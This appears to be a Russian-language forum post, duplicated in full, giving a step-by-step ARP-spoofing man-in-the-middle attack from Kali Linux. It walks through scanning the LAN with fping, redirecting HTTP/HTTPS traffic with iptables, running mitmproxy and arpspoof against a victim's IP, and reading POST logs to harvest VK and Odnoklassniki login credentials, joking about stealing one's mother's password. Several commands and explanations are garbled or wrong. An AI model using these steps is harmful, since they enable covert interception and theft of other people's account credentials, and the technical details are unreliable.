Сразу скажу метод для линуксоидов, а именно Кали 2.0
Сперва немного теории, буду объяснять своими словами
Как это происходит? - У нас есть роутер, к ним подключены два компьютера. Компьютер хакера и компьютер жертвы. Компьютер хакера меняет свой мак адрес на адрес роутера, т.е. заставляет компьютер жертвы думать, что он роутер, и отправлять ему данные по протоколам. Компьютер хакера получает данные с роутера и пропускает их через себя, отправляя данные компьютеру жертве, при этом изменяется защищенный протокол на незащищенный (по этому можно спалиться, когда в адресной строке видно что протокол незащищенный или при авторизации на учтенки в некоторых браузерах и доменах не хочет пропускать). В компьютере хакера мы имеем весь лог запросов и отправок всяких данных с компьютера жертвы. Вот и вся теория, перейдем к практике.
Сначала мы смотрим в консоли информацию о подключениях пк командой ifconfig
Мы видим что у нас IP адрес, к примеру, 192.168.1.65
Теперь с помощью команды fping -Asg 192.168.1.0/24 -r 5 >>fping.txt сканируем информацию о сети и записываем ее в файл fping.txt
Где:
1) 192.168.1.0/24 - проводится сканирование по всем шлюзам от 0 до 255
2) цифра 5 между -r и >>fping.txt мы выбираем сколько раз мы будем сканировать сеть, лучше ее отсканить пару раз, так как за один раз может плохо отсканить и выдаст мало информации
Здесь мы с помощью команды cat fping.txt | grep alive смотрим, кто находится в сети в режиме реального времени, т.е. юзают сеть, залазя в файл и находя строки с пометкой alive
Мы получим список IP адресов которые сейчас юзают сеть.
Смотрим мак адрес нашего роутера командой route -n.
В колонке Gateway у нас первым елементом будет мак адрес роутера, к примеру, 192.168.1.100
Роутер атаковать не имеет смысла, так как ничего полезного мы не добудем.
Теперь нам нужно перенаправить траффик командами:
iptables -t nat -A PREROUTING -p -tcp --destination-port 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -p -tcp --destination-port 443 -j REDIRECT --to-port 8080
Далее обрабатываем данные с помощью mitmproxy (если не установлен, то установите)
Для этого пишем команду mitmproxy -T --host
Потом нужно перенаправить данные командой echo 1 >/proc/sys/net/ipv4/ip_forward
Потом запускаем сам процесс командой arpspoof -i eth0 -t 192.168.1.13 192.168.100
Где 1-й айпишник это айпи жертвы, а 2-й айпишник роутера
Дальше с этого момента, если кто-то с компьютера жертвы будет заходить в какую-то учетку, его данные для входа будут сохранены у нас в логах. Логи можно будет посмотреть в mitmproxy, когда вы закончите атаку.
Далее в логах ищем строку, которая начинается со слова POST и смотрим на домен, если это учетка вконтакте, то там должно быть login.vk.com, нажимаем на нее, и там будут данные для входа.
Ничего сложного, даже чайник розберется.
Вот теперь ты знаешь как узнать пароль от одноклассников своей мамки))
Удачи тебе в этом.
Если нужно больше инфо, то тебе сюда:
(не реклама)
(не реклама)
копипаст
Сперва немного теории, буду объяснять своими словами
Как это происходит? - У нас есть роутер, к ним подключены два компьютера. Компьютер хакера и компьютер жертвы. Компьютер хакера меняет свой мак адрес на адрес роутера, т.е. заставляет компьютер жертвы думать, что он роутер, и отправлять ему данные по протоколам. Компьютер хакера получает данные с роутера и пропускает их через себя, отправляя данные компьютеру жертве, при этом изменяется защищенный протокол на незащищенный (по этому можно спалиться, когда в адресной строке видно что протокол незащищенный или при авторизации на учтенки в некоторых браузерах и доменах не хочет пропускать). В компьютере хакера мы имеем весь лог запросов и отправок всяких данных с компьютера жертвы. Вот и вся теория, перейдем к практике.
Сначала мы смотрим в консоли информацию о подключениях пк командой ifconfig
Мы видим что у нас IP адрес, к примеру, 192.168.1.65
Теперь с помощью команды fping -Asg 192.168.1.0/24 -r 5 >>fping.txt сканируем информацию о сети и записываем ее в файл fping.txt
Где:
1) 192.168.1.0/24 - проводится сканирование по всем шлюзам от 0 до 255
2) цифра 5 между -r и >>fping.txt мы выбираем сколько раз мы будем сканировать сеть, лучше ее отсканить пару раз, так как за один раз может плохо отсканить и выдаст мало информации
Здесь мы с помощью команды cat fping.txt | grep alive смотрим, кто находится в сети в режиме реального времени, т.е. юзают сеть, залазя в файл и находя строки с пометкой alive
Мы получим список IP адресов которые сейчас юзают сеть.
Смотрим мак адрес нашего роутера командой route -n.
В колонке Gateway у нас первым елементом будет мак адрес роутера, к примеру, 192.168.1.100
Роутер атаковать не имеет смысла, так как ничего полезного мы не добудем.
Теперь нам нужно перенаправить траффик командами:
iptables -t nat -A PREROUTING -p -tcp --destination-port 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -p -tcp --destination-port 443 -j REDIRECT --to-port 8080
Далее обрабатываем данные с помощью mitmproxy (если не установлен, то установите)
Для этого пишем команду mitmproxy -T --host
Потом нужно перенаправить данные командой echo 1 >/proc/sys/net/ipv4/ip_forward
Потом запускаем сам процесс командой arpspoof -i eth0 -t 192.168.1.13 192.168.100
Где 1-й айпишник это айпи жертвы, а 2-й айпишник роутера
Дальше с этого момента, если кто-то с компьютера жертвы будет заходить в какую-то учетку, его данные для входа будут сохранены у нас в логах. Логи можно будет посмотреть в mitmproxy, когда вы закончите атаку.
Далее в логах ищем строку, которая начинается со слова POST и смотрим на домен, если это учетка вконтакте, то там должно быть login.vk.com, нажимаем на нее, и там будут данные для входа.
Ничего сложного, даже чайник розберется.
Вот теперь ты знаешь как узнать пароль от одноклассников своей мамки))
Удачи тебе в этом.
Если нужно больше инфо, то тебе сюда:
копипаст
Последнее редактирование: